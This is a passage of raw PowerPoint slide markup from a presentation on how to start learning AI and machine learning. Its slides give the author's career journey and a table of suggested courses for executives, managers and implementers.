          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="22768" r="22768"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7810500" y="1486184"/>
            <a:ext cx="4381501" cy="5363182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BE63B29-6132-42B4-96BF-776231061ED2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix amt="56000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7810500" y="1477550"/>
            <a:ext cx="4381501" cy="5346916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="265775092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F5651EBD-27E9-416A-A54E-B0E3576DCA76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="41169" t="1" r="1126" b="49302"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2323" y="1486183"/>
            <a:ext cx="12194324" cy="5371817"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325285" y="842138"/>
            <a:ext cx="2280234"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Author name her</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>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17" name="TextBox 16"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32930DCF-3FD7-4811-AEF7-AB22FEE38453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1495611"/>
            <a:ext cx="12192001" cy="6112934"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28ABB0CC-9D54-47AA-808E-07FD8FD81E3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix amt="56000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1486184"/>
            <a:ext cx="6096001" cy="6112934"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8A14E2B-19A0-4589-A655-EE603A9DD8AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414888" y="3248761"/>
            <a:ext cx="3266222" cy="1846659"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HOW DO I GET TO GRIPS WITH THIS AI &amp; ML THANG?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400"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endParaRPr lang="en-US" sz="1400"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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Every journey will be different…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AD61650-B329-49ED-ABCA-B58DDB03F351}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7327122" y="2548008"/>
            <a:ext cx="3733932" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>My Journey</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"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r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Graduated as an Electrical Engineer in 1989 went into engineering and programming until I saw this Internet thing and thought this may be big.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"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r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Towards the end of 2014, I had the same thought around AI &amp; ML.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"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r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>My journey started with a Microsoft Course which focused on the techniques not the math. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"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r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Did three math heavy modules:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Caltech (Introductory ML course)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Columbia AI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Columbia Machine Learning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"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endParaRPr lang="en-US" sz="12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744727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9CF664A5-5490-4425-8156-3F4009090781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="11858"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1498488"/>
            <a:ext cx="12192000" cy="5388052"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>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27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48C890A7-3D36-40F6-8217-F60650A82FE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="799721" y="1902872"/>
            <a:ext cx="9515854" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HOW DO I GET TO GRIPS WITH THIS AI &amp; ML THANG?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Table 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{005FD6F8-31C0-48B4-BF83-2318C44AD7E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3984558693"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1315835" y="2609850"/>
          <a:ext cx="8275839" cy="3640859"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{21E4AEA4-8DFA-4A89-87EB-49C32662AFE0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2758613">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="158097031"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2758613">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="516003107"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2758613">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1315041398"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="455107">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Executive</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="59865" marR="59865" marT="29932" marB="29932">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Development Manager &amp; Strategist</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="59865" marR="59865" marT="29932" marB="29932">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Implementer</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="59865" marR="59865" marT="29932" marB="29932">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="238774782"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1235292">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Machine Learning for Executives</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="59865" marR="59865" marT="29932" marB="29932"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Brush-up on statistics </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Brush-up on linear algebra</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="59865" marR="59865" marT="29932" marB="29932"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Do Statistics refresher course.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Do Linear Algebra refresher course.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Make sure you can truly make python/R sing</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="59865" marR="59865" marT="29932" marB="29932"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4092538639"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="650153">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Hire the right people. NB. You need both subject matter expert and AI/ML person</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="59865" marR="59865" marT="29932" marB="29932"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Microsoft introductory course</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="59865" marR="59865" marT="29932" marB="29932"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Columbia or MITx courses</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="59865" marR="59865" marT="29932" marB="29932"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="110912297"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="845200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Work with companies that solve specific problems. Be cautious of whole solutions…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="59865" marR="59865" marT="29932" marB="29932"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Specific Microsoft courses depending on requirement</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="59865" marR="59865" marT="29932" marB="29932"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Follow up with specialisation course i.e. deeplearning.ai</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="59865" marR="59865" marT="29932" marB="29932"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4168727965"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="455107">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1100" dirty="0">
                        <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="59865" marR="59865" marT="29932" marB="29932"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>For extra credit Coursera course from Andrew NG</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="59865" marR="59865" marT="29932" marB="29932"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Find a problem and solve it</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="59865" marR="59865" marT="29932" marB="29932"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2836182729"/>
                  </a:ext>
